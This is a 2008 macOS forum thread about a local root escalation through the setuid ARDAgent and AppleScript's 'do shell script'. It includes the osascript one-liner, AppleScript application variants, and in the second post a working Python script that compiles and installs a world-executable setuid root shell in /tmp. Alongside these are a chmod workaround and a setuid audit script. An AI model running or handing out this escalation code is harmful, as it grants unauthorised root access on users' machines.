Mac OS X Local root escalation vulnerability

Discussion in 'macOS' started by zorinlynx, Jun 18, 2008.

  1. zorinlynx macrumors 603


    May 31, 2007
    Florida, USA
    From Slashdot:

    "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not."

    If you administer Mac OS X systems in a lab environment where local users shouldn't be able to get root, this can affect you. Thankfully for most of us, the user must be logged in *locally* (into the window system) for this to work.

    A quick workaround is to remove the suid bit on the ARDAgent:

    sudo chmod u-s /System/Library/CoreServices/RemoteManagement/

    This may be undone by repair permissions, though, and possibly breaks Remote Desktop, so keep an eye on it until Apple officially patches the bug.
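As an added example (not code from the thread), here is a small POSIX shell audit for the situation the first post describes: it walks a directory tree, lists every setuid executable with its owner, and tags the ones that live inside an application bundle (`*.app/Contents/MacOS`, the ARDAgent case, since a bundled app can be sent Apple events such as `do shell script`) and the ones that are also world-writable (the mode 4777 a successful exploit might leave behind). It also wraps the `chmod u-s` workaround in a function that confirms the bit is actually gone. The function names and tag labels are my own; the tree to scan is given as an argument, so you can point it at `/` on a real system or at a test directory.

```shell
#!/bin/sh
# Added example, not part of the original thread.
# Prints one line per setuid file under $1:  <owner> <tags> <path>
# Tags (hypothetical labels chosen for this example):
#   BUNDLED - inside *.app/Contents/MacOS, i.e. a GUI app that can receive
#             Apple events ("do shell script") while holding the setuid bit
#   WWRITE  - the file is also world-writable (e.g. mode 4777)
#   PLAIN   - neither of the above
audit_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        line=$(ls -ld "$f")
        owner=$(printf '%s\n' "$line" | awk '{print $3}')
        perms=$(printf '%s\n' "$line" | cut -c1-10)   # e.g. -rwsr-xr-x
        tags=""
        case "$f" in
            *.app/Contents/MacOS/*) tags="${tags}BUNDLED," ;;
        esac
        case "$perms" in
            ????????w?) tags="${tags}WWRITE," ;;       # 9th char = other-write
        esac
        [ -n "$tags" ] || tags="PLAIN,"
        printf '%s %s %s\n' "$owner" "${tags%,}" "$f"
    done
}

# The workaround from the first post: clear the setuid bit, then verify with
# test -u that it really is gone (repair permissions may put it back later).
drop_setuid() {
    chmod u-s "$1" && [ ! -u "$1" ]
}

# Stand-alone use: ./audit.sh /System/Library/CoreServices
if [ "$#" -gt 0 ]; then
    audit_setuid "$1"
fi
```

Run it as root if you want `find` to descend into every directory; as an ordinary user it still covers the world-readable system paths, which is where the interesting setuid binaries live. Anything tagged BUNDLED deserves the same scrutiny ARDAgent got.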
  2. SC68Cal macrumors 68000

    Feb 23, 2006
    Local privilege escalation.

    # Ported to Python 3: the Python 2 'commands' module is gone, subprocess.getoutput is the drop-in.
    import subprocess

    # Source for a tiny setuid wrapper that execs an interactive root shell.
    payload = (r"printf '#include <stdlib.h>\n#include <unistd.h>\n"
               r"int main(void) { setuid(0); setgid(0); seteuid(0); "
               r'system("/bin/sh -i"); return 0; }\n'
               "' > /tmp/r00t.c")
    buildcmd = "gcc /tmp/r00t.c -o /tmp/r00ted"
    # ARDAgent is setuid root, so the shell script it is told to run executes as root.
    escalate = ("osascript -e 'tell app \"ARDAgent\" to do shell script "
                "\"chown root /tmp/r00ted; chmod 4777 /tmp/r00ted\"'")
    print('Building your shell', subprocess.getoutput(payload), subprocess.getoutput(buildcmd))
    print(subprocess.getoutput(escalate))
    print("r00t is located at /tmp/r00ted")
    Have fun.
  3. cdlxxvi macrumors newbie

    Apr 30, 2008
    Don't worry, guys, knowing how seriously Apple treats known vulnerabilities (Safari carpet bombing being the prime example), we can expect an update any year now :rolleyes:
  4. Phil A. Moderator

    Phil A.

    Staff Member

    Apr 2, 2006
    Shropshire, UK
    There is no way of defending this - it is a massive hole and Apple should hang their heads in shame. Why the hell does ARDAgent have the SUID bit set when it can run shell scripts?!
    It would be trivial to use this exploit to install a trojan with root privileges and without any secondary authentication, and the question has to be: are there any more of these hidden away in OS X?
    The Apple world just got a bit more dangerous...
  5. SC68Cal macrumors 68000

    Feb 23, 2006
    I would consider all binaries that Apple has given SUID bits to suspect. They've proven that they can't be trusted with them.

  6. subaqua macrumors member

    Jan 15, 2008
    I cannot reproduce this on my Leopard system:

    (spartan) ~ % osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
    23:47: execution error: ARDAgent got an error: "whoami" doesn’t understand the do shell script message. (-1708)

    (spartan) ~ % uname -a
    Darwin 9.3.0 Darwin Kernel Version 9.3.0: Fri May 23 00:49:16 PDT 2008; root:xnu-1228.5.18~1/RELEASE_I386 i386

    My copy of ARDAgent has the suid bit set but I don't appear to be vulnerable...

    (spartan) ~ % ls -l /System/Library/CoreServices/RemoteManagement/
    -rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 /System/Library/CoreServices/RemoteManagement/*

    I am logged into the desktop running the above commands from terminal app.

    Was this fixed in 10.5.1, 10.5.2, or 10.5.3 already?

  7. priller macrumors regular

    Dec 15, 2007
    Still worked with 10.5.3 for me

    gamma:~ priller$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

  8. mojococo macrumors newbie

    Jun 19, 2008
    None of those are scriptable.
  9. SC68Cal macrumors 68000

    Feb 23, 2006
    Who said that they needed to be scriptable? You've got your blinders on.
  10. mojococo macrumors newbie

    Jun 19, 2008
    If Remote Desktop is enabled ARDAgent will already be running as the local user, launchd ignores setuid.
  11. mojococo macrumors newbie

    Jun 19, 2008
    The OP. Don't post what you don't understand.
  12. Random Chaos macrumors member

    Jan 16, 2008
    And as was said, fully exploitable via scripts. For instance, make a nicely trusted AppleScript, saved as an Application:

    on run
    	do shell script "osascript -e 'tell app \"ARDAgent\" to do shell script \"say quack\"'"
    end run
    You'll notice that it says it with the default voice, not the one set for your account.

    So how long before we see malware or trojans?
  13. mojococo macrumors newbie

    Jun 19, 2008
    You don't need to use osascript if you're already in an applescript!

    on run
    	tell app "ARDAgent" to do shell script "say quack"
    end run
  14. SC68Cal macrumors 68000

    Feb 23, 2006
  15. mojococo macrumors newbie

    Jun 19, 2008
    If you have something useful to say about setuid binaries, post it.
  16. martychang macrumors regular

    Sep 3, 2007
    That MOAB 15 bug is scary stuff :eek:
    I read Rixstep regularly so I'm not entirely sure how I missed that.

    I want to love you Apple, but you make it so hard :(
  17. Iroganai macrumors regular


    Oct 18, 2003
    First, this should be posted on the top page of Macrumors.
    Second, to SC68CAL, "do shell script" is not really functionality of ARDAgent; it is there FOR ANY SCRIPTABLE APP as part of its AppleScript-ability, and any GUI app which is registered with LaunchServices can be sent an AppleEvent.
    Apple is to blame for leaving AppleScript-ability on setuid apps. It's a gaping hole in the security!

    In your list of setuid'ed executables, the only other GUI app is
    osascript -e 'tell app "check_afp" to do shell script "whoami" '
    didn't "work" on my machine. Mmm ...
  18. lugesm macrumors 6502a


    Sep 7, 2007
    For a relative Mac newbie most of the above posts read like Greek. :confused:

    Can anyone tell me if there is a simple way to detect if the Trojan is already on my system?
  19. martychang macrumors regular

    Sep 3, 2007
    Not really, any Malware's first goal, trojan or otherwise, is to make sure nobody can see it. This is why Windows users have such problems, even when they run all kinds of security programs: you basically have to be familiar with what's supposed to be on the system, and spot things that look fishy.
